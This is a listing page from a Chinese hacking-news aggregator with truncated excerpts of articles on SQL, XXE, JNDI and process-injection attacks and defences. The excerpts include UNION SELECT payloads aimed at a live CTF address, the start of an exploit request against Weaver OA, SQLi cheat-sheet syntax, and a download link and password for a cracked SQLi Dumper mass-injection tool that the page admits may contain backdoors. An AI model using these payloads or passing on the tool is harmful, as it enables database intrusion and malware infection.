记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Python代码审计实战案例总结之SQL和ORM注入

介绍 Python代码审计方法多种多样,但是总而言之是根据前人思路的迁移融合扩展而形成。目前Python代码审计思路,呈现分散和多样的趋势。Python微薄研发经验以及结合实际遇到的思路和技巧进行总结,以便于朋友们的学习和参考。 SQL注入和ORM注入 这两者注入相似度较高,所以打算放在一起分析和总结。它们所用原理OWASP TOP TEN 中的描述非常合适,“将不受信任的数据作为命令或查询的一部分发送到解析器时,会产生诸如SQL注入、NoSQL注入、OS注入和LDAP注入的注入缺陷。攻击者的恶意数据可以诱使解析器在没有适当授权的情况下执行非预期命令或访问数据。”。 SQL注入 Python 中常见存在风险SQL语句,在id或者Name可控的情况下存在安全隐患。可
发布时间:2019-12-13 12:20 | 阅读:11404 | 评论:0 | 标签:注入

JNDI注入及Fastjson反序列化漏洞分析

0x00 前言本文主要记录了JNDI注入的原理及利用,并拿Fastjson反序列化漏洞作为例子简单分析了其在实际漏洞下的利用思路。0x01 JNDI注入何为JNDIJNDI(Java Naming and Directory Interface,Java命名和目录接口)是SUN公司提供的一种标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,由管理者将JNDI API映射为特定的命名服务和目录系统,使得Java应用程序可以和这些命名服务和目录服务之间进行交互。简单来说JNDI可以通过名字寻找存储在指定位置的对象(Object),比如对象可以存储在rmi,ldap,CORBA等。RMI 及LADAJava RMI,即 远程方法调用(Remote
发布时间:2019-12-11 17:40 | 阅读:9271 | 评论:0 | 标签:注入 漏洞

如何防止恶意的第三方DLL注入到进程

虽然Windows系统的安全机制是不允许任何微软签名的代码注入到进程之中的,但是网络犯罪分子仍然会有很多方法来绕过这种安全机制,比如说通过执行用户态钩子向正在运行的进程注入DLL等等。而本文所介绍的技术也许对于某些反病毒产品、EDR和安全防御人员来说,也许会提供一些有价值的思路。 UpdateProcThreadAttribute 第一种防止恶意第三方DLL注入到进程的方法就是使用UpdateProcThreadAttribute,这个属性是PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY中一个我们可以自行设置的属性。 下面的代码段显示了如何使用MITIGATION策略来创建一个新的记事本进程,而这个进程将阻止任意非微软签名的代码注入其中。
发布时间:2019-12-01 17:20 | 阅读:18199 | 评论:0 | 标签:注入

代码注入技术之Shellcode注入

代码注入是指在应用程序中注入任意外部代码的行为,有两种类型的代码注入:1.注入易受攻击的程序;2.注入不易受攻击的程序;如果代码注入是在易受攻击的应用程序中完成的,则可以通过利用在处理无效数据时发生的漏洞来实现。在这种情况下,代码注入的程度就取决于应用程序中的错误,我们也将其称为“漏洞”。但问题在于,应用程序应该具有可以被利用来获得代码执行的漏洞。本系列针对第二种情况,即不希望或不需要该应用程序具有漏洞。正如所预料的那样,这为应用程序提供了一个非常广泛的领域,同时也为滥用操作系统提供了机会。恶意软件通常使用此方法,因为执行代码注入之前不需要满足任何条件,并且操作系统本身也完全支持该方法。所有主要的操作系统都提供ABI和
发布时间:2019-11-29 13:25 | 阅读:16829 | 评论:0 | 标签:Web安全 代码注入 注入

XML (XXE) 注入Payload List

XML (XXE) 注入Payload List在本节中,我们将解释什么是XML注入,描述一些常见的示例,解释如何发现和利用各种XXE注入,并总结如何防止XXE注入攻击。什么是XML注入?XML注入(也称为XXE)是一个Web安全漏洞,它使攻击者能够干扰应用程序对XML数据的处理。它通常使攻击者可以查看应用程序服务器文件系统上的文件,并与应用程序本身可以访问的任何后端或外部系统进行交互。在某些情况下,攻击者可以利用XXE漏洞执行服务器端请求伪造(SSRF)攻击,从而升级XXE攻击,以破坏底层服务器或其他后端基础结构。XML (XXE) 注入XXE攻击有多种类型:XXE Attack TypeDescriptionExploiting XXE to Retrieve FilesWhere an external
发布时间:2019-11-28 13:00 | 阅读:11989 | 评论:0 | 标签:注入

SQL注入Payload List

SQL注入Payload List本文中解释什么是SQL注入,罗列一些常见SQL注入语句示例,常见SQL注入扫描工具等。什么是SQL注入(SQLi)?SQL注入是一个网络安全漏洞,它使攻击者能够干扰应用程序对其数据库的查询。通常,它使攻击者可以查看他们通常无法检索的数据。这可能包括属于其他用户的数据,或者应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除此数据,从而导致应用程序内容或行为的永久更改。在某些情况下,攻击者可以升级SQL注入攻击以破坏基础服务器或其他后端基础结构,或者执行拒绝服务攻击。SQL注入类型描述In-band SQLi (Classic SQLi)In-band SQLi注入是SQL注入攻击中最常见和最容易利用的。当攻击者能够使用相同的查询发起攻击并收集结果时,就会发生I
发布时间:2019-11-22 13:00 | 阅读:18717 | 评论:0 | 标签:注入

威胁预警 | Solr velocity模板注入远程命令执行已加入watchbog武器库

概述近日,阿里云安全团队监测到挖矿团伙watchbog更新了其使用的武器库,增加了最新Solr Velocity 模板注入远程命令执行漏洞的攻击方式,攻击成功后会下载门罗币挖矿程序进行牟利。建议用户及时排查自身主机是否受到影响。值得注意的是,此漏洞利用代码于10月31日被公布,11月2日阿里云安全团队就已发现watchbog团伙利用此漏洞进行入侵,植入木马进行挖矿,漏洞公开不足2日便被挖矿团伙利用进行攻击牟利。可以看到,当新的漏洞被披露出来时,可供企业用户修复的时间窗口越来越短,因此防守方需要及时地关注新披露可利用漏洞,以及采取缓解措施或进行修复,必要时可考虑选用安全产品帮助保障安全。背景介绍watchbog
发布时间:2019-11-05 18:10 | 阅读:23546 | 评论:0 | 标签:系统安全 威胁预警 注入

实现Windows进程注入的7种新方法

简介在这里,我们主要对@hexacorn上周发布的代码注入/进程注入相关的文章进行进一步的分析。在上周,@hexacorn提出了7种新型的攻击方式,以“粉碎式攻击”的方法来实现代码注入或重定向。在本文中,我们将具体讨论这些新型注入方法,并提供一些可用的示例。前五种方法的示例都将使用“Edit”和“Rich Edit”控件,最后两个则使用SysListView32和SysTreeView32。关于Rich Edit控件要进行新型注入方法的尝试,我们可以选择遍历所有窗口,例如EnumWindows,从窗口句柄中检索类的名称,然后将字符串的开始部分与“RICHEDIT”进行比较。除了这种方法之外,我们还可以使用FindWin
发布时间:2019-11-01 13:10 | 阅读:27884 | 评论:0 | 标签:系统安全 windows 注入

【ATT & CK】ATT & CK中的进程注入三部曲

内容概要本文详细介绍分析了Mitre ATT&CK矩阵中的三种进程注入手法:经典的进程注入、Process Hollowing和Process Doppelgänging。并对相应的手法趋势作出总结。恶意软件使用进程注入的主要目的大致是为了躲避杀软的检测或者进行提权操作。这里我们将主要针对第一种情况下的3种手段进行详细的讨论。第一曲:轻快童谣–经典的进程注入(DLL注入)这是最为经典的手段,流程也十分简洁明了即:OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> C
发布时间:2019-10-29 13:10 | 阅读:18839 | 评论:0 | 标签:恶意软件 注入

SQLi Dumper v9.8.4破解版/SQL注入工具

SQLi Dumper v9.8破解版一位俄罗斯黑客写的批量注入工具,支持多个搜索引擎批量;从URL,POST,Cookies,UserLogin或UserPassword进行注射点的自动分析;同时Dumper支持使用多线程(数据库/表/列/获取数据)转储数据,支持代理等等功能集于一身。SQL注入工具该工具比著名的Havij SQL注入功能更强大,支持常见的SQL注入方法。下载SQLi Dumper v9.8破解版http://www.mediafire.com/file/9f9sk29rfeg39q3/SQLi_v.9.8.4_pass_222.zip/file,密码222提示,渗透测试类的软件工具,都建议在虚拟机内运行,我们不保证后门和破坏性事件的发生。
发布时间:2019-10-21 12:45 | 阅读:27987 | 评论:0 | 标签:注入

泛微OA前台sql注入漏洞检测(ORACLE数据库)

0x00 前言泛微提供了移动办公、微信办公、协同办公(OA)、流程管理、信息门户、知识管理、费控管理等功能,适用于手机和pc端,是当今比较主流的OA系统之一。前段时间刚爆出Beanshell接口任意代码执行泛微OA远程代码执行漏洞利用),现在又爆出前台sql注入漏洞。0x01 漏洞检测本次漏洞是由于WorkflowCenterTreeData接口在使用Oracle数据库时,参数过滤不严导致的sql注入漏洞。123456789101112POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1Host: zhengbao.wangUser-Agent: Mozilla/5.0 (Macintosh;
发布时间:2019-10-11 12:25 | 阅读:22117 | 评论:0 | 标签:注入 漏洞

SQL注入备忘录

该SQL注入备忘录包含有用的语法示例,您可以使用这些语法来执行SQL注入攻击时经常出现的各种任务。SQL injection cheat sheetString concatenation 字符串串联您可以将多个字符串连接在一起以组成一个字符串。Oracle'foo'||'bar'Microsoft'foo'+'bar'PostgreSQL'foo'||'bar'MySQL'foo' 'bar' [Note the space between the two strings]CONCAT('foo','bar')Comments 注释您可以使用注释来截断查询并删除输入之后的原始查询部分。Oracle--commentMicrosoft--comment/*comment*/PostgreSQL--co
发布时间:2019-10-08 12:45 | 阅读:19766 | 评论:0 | 标签:注入

Metinfo7 后台注入及一些tips

很可惜是个后台的注入 跟汤姆表哥再搞创宇的年度任务
发布时间:2019-10-07 00:15 | 阅读:20340 | 评论:0 | 标签:注入

利用USB外设实现恶意命令注入

在许多的物联网设备中,用户是可以插入USB设备来执行某些操作的。不过目前的USB等外接设备,通常可以增大攻击面。在实际测试中,我们发现,某些物联网设备会自动信任插入该设备的USB设备,如果设置了某些属性的话,插入的USB设备还会未经相应的安全检查,来创建安装目录名称。此外,某些安装过程还是通过C语言中 system函数实现的,system函数可以调用一些DOS命令,这样恶意USB设备就可以设置某些参数以实现任意命令执行。由于物联网设备的守护进程是以root身份运行的,这意味着,攻击者可以通过USB设备,然后伪装从用户执行命令了。但是问题在于,如何利用USB外设实现命令注入?本文的目的,就是探索这个过程,由于可以在and
发布时间:2019-09-03 10:55 | 阅读:35156 | 评论:0 | 标签:漏洞 注入

远程进程shellcode注入调试技巧

在病毒分析的过程中,时常会遇到很多病毒为了躲避杀软的检测,使用进程注入的方式,将shellcode注入到系统进程中执行,本文将介绍一些在遇到shellcode注入进程时所使用的调试技巧。 情形一:PE进程远程注入shellcode到其它进程PE类文件在进行进程注入的时候,可能会注入一个PE文件,也有可能是注入一段shellcode,但注入的流程通常是一样的.注入已有进程:OpenProcess —> WriteProcessMemory —> CreateRemoteThread;创建进程注入:CreateProcess —> Wr
发布时间:2019-08-23 13:10 | 阅读:49942 | 评论:0 | 标签:系统安全 shellcode注入 注入

一道题引发的无列名注入

@Syst1m的考核题 题目地址 http://152.136.179.79:18084/ 传入id=3为flag的id。 常规联合查询注入 http://152.136.179.79:18084/?id=3 union select 1,2,3 三个字段 http://152.136.179.79:18084/?id=3 union select 1,2,(select table_name from information_schema.tables where table_schema=database()) 拿到flag所在的表,继续查列名 http://152.136.179.79:18084/?id=3 union select 1,2,(select column_name from info
发布时间:2019-08-23 00:15 | 阅读:32616 | 评论:0 | 标签:注入

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云